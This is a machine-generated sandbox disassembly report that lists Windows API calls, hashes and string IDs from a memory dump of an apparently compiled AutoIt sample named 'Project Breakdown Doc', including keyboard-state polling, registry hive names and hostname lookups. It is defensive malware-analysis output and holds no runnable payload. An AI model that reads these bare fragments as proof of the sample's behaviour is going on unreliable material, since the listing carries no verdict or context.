                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-2391861430
                                                  • Opcode ID: dc9794b6b00c4bd0069fc84310ee40ef9371094ba0df47b23fc3e038161e2fbd
                                                  • Instruction ID: 7aa95e77326b3b24a565a78980c42890ba9d6181ea214890caa306da369e9ee5
                                                  • Opcode Fuzzy Hash: dc9794b6b00c4bd0069fc84310ee40ef9371094ba0df47b23fc3e038161e2fbd
                                                  • Instruction Fuzzy Hash: 38515D7190021ABBCF15EBE0CD86EEEB779BF15300F100265F519A21A1EB316F59EB61
                                                  APIs
                                                    • Part of subcall function 00C60B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C46C6C,?,00008000), ref: 00C60BB7
                                                    • Part of subcall function 00C448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C448A1,?,?,00C437C0,?), ref: 00C448CE
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C46D0D
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C46E5A
                                                    • Part of subcall function 00C459CD: _wcscpy.LIBCMT ref: 00C45A05
                                                    • Part of subcall function 00C6387D: _iswctype.LIBCMT ref: 00C63885
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-1018226102
                                                  • Opcode ID: 388faec87d14c1a8a7eb8868656d0ed5690598129028c11b2c44f7536bb45e15
                                                  • Instruction ID: 2496d4c109fb4363b8009dbd7598286caa9c0e2901c17cd62274669bb717af5b
                                                  • Opcode Fuzzy Hash: 388faec87d14c1a8a7eb8868656d0ed5690598129028c11b2c44f7536bb45e15
                                                  • Instruction Fuzzy Hash: 97029F315083419FC724EF24C881AAFBBE5BF99314F14491DF49A972A2DB30DA49EB53
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C445F9
                                                  • GetMenuItemCount.USER32(00D06890), ref: 00C7D7CD
                                                  • GetMenuItemCount.USER32(00D06890), ref: 00C7D87D
                                                  • GetCursorPos.USER32(?), ref: 00C7D8C1
                                                  • SetForegroundWindow.USER32(00000000), ref: 00C7D8CA
                                                  • TrackPopupMenuEx.USER32(00D06890,00000000,?,00000000,00000000,00000000), ref: 00C7D8DD
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C7D8E9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 2751501086-0
                                                  • Opcode ID: fce837c269a22143c08cb89ce40482494ca9da637c8272d565f85ce6ad1ef864
                                                  • Instruction ID: fb3e1d2fa8c9dafd89870dff98c1bf19fbcb9b47e64651517cfddf9f0dddae74
                                                  • Opcode Fuzzy Hash: fce837c269a22143c08cb89ce40482494ca9da637c8272d565f85ce6ad1ef864
                                                  • Instruction Fuzzy Hash: A7711570601205BEEB249F25DC85FEABF75FF05368F208216F52AA61E0C7B16910DBA1
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC0038,?,?), ref: 00CC10BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: 85808e2bdc65ea75e762ddf39b9f3716759d833da917dcc54b8eb554b2721809
                                                  • Instruction ID: 5a6c5ce76d4ed548a471715d9101f8d486b6827c62553c11f5675918160310bf
                                                  • Opcode Fuzzy Hash: 85808e2bdc65ea75e762ddf39b9f3716759d833da917dcc54b8eb554b2721809
                                                  • Instruction Fuzzy Hash: 57415E7011424E9BCF20EF91D891AEF3724BF12350F684558FEA16B292DB30AE1ADB51
                                                  APIs
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                    • Part of subcall function 00C47A84: _memmove.LIBCMT ref: 00C47B0D
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CA55D2
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CA55E8
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA55F9
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CA560B
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CA561C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: d812bc42bc13089c7f20416c3a6d4bf3848f4ef2fea959fb6422f8d32a90a3cb
                                                  • Instruction ID: ffc0de50b3191a64c093d31d94a5d3c5558d0a8f0ae7709ea14697ae195173e6
                                                  • Opcode Fuzzy Hash: d812bc42bc13089c7f20416c3a6d4bf3848f4ef2fea959fb6422f8d32a90a3cb
                                                  • Instruction Fuzzy Hash: 4D119460A5056E79D720B761CC8ADFFBB7CFF92B00F400569B515A30E1DF605E09D6A2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: 869098cb062e91c5c1d4d97a1ca4aaf576ea4abb0bf779d5362ab4400048ae6e
                                                  • Instruction ID: b38cfa3242a18e80926e278e2d02568ba22a97c9b68425416ec167c490674ee1
                                                  • Opcode Fuzzy Hash: 869098cb062e91c5c1d4d97a1ca4aaf576ea4abb0bf779d5362ab4400048ae6e
                                                  • Instruction Fuzzy Hash: E611D531904115AFCB34EB74DC46FDF77AC9B42714F04417AF405D6091EFB19A829651
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00CA521C
                                                    • Part of subcall function 00C60719: timeGetTime.WINMM(?,75C0B400,00C50FF9), ref: 00C6071D
                                                  • Sleep.KERNEL32(0000000A), ref: 00CA5248
                                                  • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00CA526C
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CA528E
                                                  • SetActiveWindow.USER32 ref: 00CA52AD
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CA52BB
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CA52DA
                                                  • Sleep.KERNEL32(000000FA), ref: 00CA52E5
                                                  • IsWindow.USER32 ref: 00CA52F1
                                                  • EndDialog.USER32(00000000), ref: 00CA5302
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 15dccde510e1f7344d98982eca078d68f8545cdd18ea5a4db9229e66cb88e8d5
                                                  • Instruction ID: 4e6d5010116ed402281ffd8a2cc504113293da7d85b7a603bac38e05df39e143
                                                  • Opcode Fuzzy Hash: 15dccde510e1f7344d98982eca078d68f8545cdd18ea5a4db9229e66cb88e8d5
                                                  • Instruction Fuzzy Hash: 6F21A170204B46BFE7005B30EC8CF6E3B6AEB8634AF045438F109C62B1CBA1AD519B31
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • CoInitialize.OLE32(00000000), ref: 00CAD855
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CAD8E8
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00CAD8FC
                                                  • CoCreateInstance.OLE32(00CD2D7C,00000000,00000001,00CFA89C,?), ref: 00CAD948
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CAD9B7
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00CADA0F
                                                  • _memset.LIBCMT ref: 00CADA4C
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00CADA88
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CADAAB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00CADAB2
                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00CADAE9
                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00CADAEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: 6eeb2982e3c8217881455a2eaac49f7b771a3c23479554ab8b6a77547d0821c6
                                                  • Instruction ID: 849132a1dacf98422a0547958fd4cc3f7bcc12673b36325901c690074d377cf4
                                                  • Opcode Fuzzy Hash: 6eeb2982e3c8217881455a2eaac49f7b771a3c23479554ab8b6a77547d0821c6
                                                  • Instruction Fuzzy Hash: CDB10F75A00119AFDB14DFA4C888EAEBBF9FF49304B148469F50AEB251DB30EE45DB50
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00CA05A7
                                                  • SetKeyboardState.USER32(?), ref: 00CA0612
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00CA0632
                                                  • GetKeyState.USER32(000000A0), ref: 00CA0649
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00CA0678
                                                  • GetKeyState.USER32(000000A1), ref: 00CA0689
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00CA06B5
                                                  • GetKeyState.USER32(00000011), ref: 00CA06C3
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00CA06EC
                                                  • GetKeyState.USER32(00000012), ref: 00CA06FA
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00CA0723
                                                  • GetKeyState.USER32(0000005B), ref: 00CA0731
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 410638af85a4cdf7a9dc6b1c7984f5d03331602e406771340a03f19a6818b71b
                                                  • Instruction ID: a7ee84b5411e068592fff5b2531f073db6bbc0897037198195201b1344db9359
                                                  • Opcode Fuzzy Hash: 410638af85a4cdf7a9dc6b1c7984f5d03331602e406771340a03f19a6818b71b
                                                  • Instruction Fuzzy Hash: 8A51DB20E0478619FB35DBA088547EEBFB49F033C8F18459DD9D25B1C2DA64AB4CCB55
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 00C9C746
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C9C758
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C9C7B6
                                                  • GetDlgItem.USER32(?,00000002), ref: 00C9C7C1
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C9C7D3
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C9C827
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C9C835
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C9C846
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C9C889
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C9C897
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C9C8B4
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C9C8C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: 9581392b446e56177b35f1feedde3fb46e7f71e618c29bd08378fff473cf37f6
                                                  • Instruction ID: 2878ca26a26d9ce32d1df773a9d1caaf502ad5f949464a41b433271d9f5a1986
                                                  • Opcode Fuzzy Hash: 9581392b446e56177b35f1feedde3fb46e7f71e618c29bd08378fff473cf37f6
                                                  • Instruction Fuzzy Hash: 51512D71B00205ABDF18CFA9DD99FAEBBBAEB88711F14812DF516D7290D7709E018B50
                                                  APIs
                                                    • Part of subcall function 00C41B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C42036,?,00000000,?,?,?,?,00C416CB,00000000,?), ref: 00C41B9A
                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C420D3
                                                  • KillTimer.USER32(-00000001,?,?,?,?,00C416CB,00000000,?,?,00C41AE2,?,?), ref: 00C4216E
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00C7BEF6
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C416CB,00000000,?,?,00C41AE2,?,?), ref: 00C7BF27
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C416CB,00000000,?,?,00C41AE2,?,?), ref: 00C7BF3E
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C416CB,00000000,?,?,00C41AE2,?,?), ref: 00C7BF5A
                                                  • DeleteObject.GDI32(00000000), ref: 00C7BF6C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 889cac8b66d07c9029870196cbb8887b9619a9bdad29584d43a139da1021d26c
                                                  • Instruction ID: 3ec48ab31ee9ad79ce468e7b049b85d55427e8e598ab878390251cbf65b572ff
                                                  • Opcode Fuzzy Hash: 889cac8b66d07c9029870196cbb8887b9619a9bdad29584d43a139da1021d26c
                                                  • Instruction Fuzzy Hash: F3618534500710DFCB259F15CD4AB2AB7F2FB50716F90842DE55A8BAA0C771AEA1DFA0
                                                  APIs
                                                    • Part of subcall function 00C425DB: GetWindowLongW.USER32(?,000000EB), ref: 00C425EC
                                                  • GetSysColor.USER32(0000000F), ref: 00C421D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 30cc1e27ada8762b1cdb5a0229ec296081bb40fcf0fc2e747c5cef8896848b27
                                                  • Instruction ID: 5603339386514969dff7e410dab9cb45c95e7022c15d79e781b8364e32728b63
                                                  • Opcode Fuzzy Hash: 30cc1e27ada8762b1cdb5a0229ec296081bb40fcf0fc2e747c5cef8896848b27
                                                  • Instruction Fuzzy Hash: 2C41A2311001509FDB255F28EC89BBD3B66FB06331F988269FE758A1E2C7718D42DB61
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,00CCF910), ref: 00CAAB76
                                                  • GetDriveTypeW.KERNEL32(00000061,00CFA620,00000061), ref: 00CAAC40
                                                  • _wcscpy.LIBCMT ref: 00CAAC6A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  • Opcode ID: bea861608499c00d907970325fc572a2fcdd12f391487ccef6f1a3e4a7c91598
                                                  • Instruction ID: 965d689703685bf3a26eadf334928f1add1989283b54d3c8a161e094445bebb2
                                                  • Opcode Fuzzy Hash: bea861608499c00d907970325fc572a2fcdd12f391487ccef6f1a3e4a7c91598
                                                  • Instruction Fuzzy Hash: 3951BF701083069BC720EF14D881AAFB7A5FF85318F14492DF596972A2DB31DE09DB53
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  • Opcode ID: 1374084c81780bb8e40fbca86e219989fda6e02fcd906ac55d90621bb718c864
                                                  • Instruction ID: 3afe018d9ee17f81a1d863179ece29b5c22702db3d7e3e9214c1e54a673c8229
                                                  • Opcode Fuzzy Hash: 1374084c81780bb8e40fbca86e219989fda6e02fcd906ac55d90621bb718c864
                                                  • Instruction Fuzzy Hash: B641F571604215AFDB34EF79D882E7BB7E8FB44300F20846EE64DD7291EA319942EB11
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CC73D9
                                                  • CreateMenu.USER32 ref: 00CC73F4
                                                  • SetMenu.USER32(?,00000000), ref: 00CC7403
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC7490
                                                  • IsMenu.USER32(?), ref: 00CC74A6
                                                  • CreatePopupMenu.USER32 ref: 00CC74B0
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC74DD
                                                  • DrawMenuBar.USER32 ref: 00CC74E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  • Opcode ID: 74fa9036c3751556e74bceebd5b6ad28120fc904d37e7b47260565e9208412c1
                                                  • Instruction ID: 18b8706dbb7efa0070d31a3cd98388e8dcc81ff0bc028dafa811646b9489b35b
                                                  • Opcode Fuzzy Hash: 74fa9036c3751556e74bceebd5b6ad28120fc904d37e7b47260565e9208412c1
                                                  • Instruction Fuzzy Hash: DF412575A00209EFDB24DF64D884F9ABBB9FF49310F14412DEA5597360DB31AA20DF60
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CC77CD
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00CC77D4
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CC77E7
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00CC77EF
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CC77FA
                                                  • DeleteDC.GDI32(00000000), ref: 00CC7803
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00CC780D
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CC7821
                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CC782D
                                                  Strings
